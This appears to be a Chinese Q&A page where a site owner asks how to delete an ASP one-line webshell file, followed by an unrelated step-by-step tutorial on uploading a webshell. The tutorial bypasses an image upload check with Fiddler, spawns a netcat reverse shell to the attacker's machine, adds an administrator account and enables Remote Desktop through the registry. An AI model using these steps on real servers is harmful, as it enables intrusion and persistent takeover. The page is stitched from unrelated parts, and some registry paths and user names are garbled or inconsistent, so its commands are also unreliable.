服务器中了php后门，文件0fuck.asp，打开后是一句话木马<%Eval(Request(chr(112))):Set fso=CreateObject

Posted 2023-03-22

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.Serve
用ftp根本删不掉，如何才能彻底删除

参考技术A 这是明显的一句话木马，权限很强大，可以做权限内的任何事情。
FTP删除不掉可能是因为黑客设置了权限，可以联系空间商协助删除，另外可以建议他们安装一个护卫神入侵防护系统，自动监控木马并隔离或删除。 参考技术B FTP的权限太低了，你找服务器给你删除就可以了。一般FTP对某些文件是没有删除权限的。 参考技术C 用操作系统的root权限应该可以删除。 不过，最好还是搞清楚后门文件的位置和原理再删除。本回答被提问者采纳

webshell后门上传流程

1、将webshell.php的后缀名改成jpg等图片格式，即web.jpg。

2、打开相应网址，注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点，切换到raw界面，等到其提示相应请求代码后，将其代码段中第二个含有上传图片名称的代码改成web.php，之后继续响应请求。

3、此时已经成功把后门程序上传，将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面（注意将？php覆盖）刷新网页。

4、然后输入相应密码进入控制服务器端，将本机的nc.exe（netcut）上载到其C盘根目录下。

5、而后在自己本机打开cmd命令窗口找到nc.exe所在的目录并运行

6、这时已经进入nc.exe，在Cmd line:后输入nc -vv -l -p 8080进行监听

7、在控制服务器端选择Execute Command窗口，输入‘c:\nc.exe -vv [自身ip 端口] -e cmd.exe‘启动nc（绑定服务器端主机的cmd.exe在本机的相应端口）

8、然后就可以添加自己的账号作为管理员了，具体操作是:

(1) net user hacker 3836546 /add （添加用户）

(2) net user localgroup administrators test /add （添加到管理员组）

9、写入注册表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

（win2k,winxp,win2k3下开启远程桌面,不用重启）

10、有时还需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后，你就可以进入服务器端的主机进行操作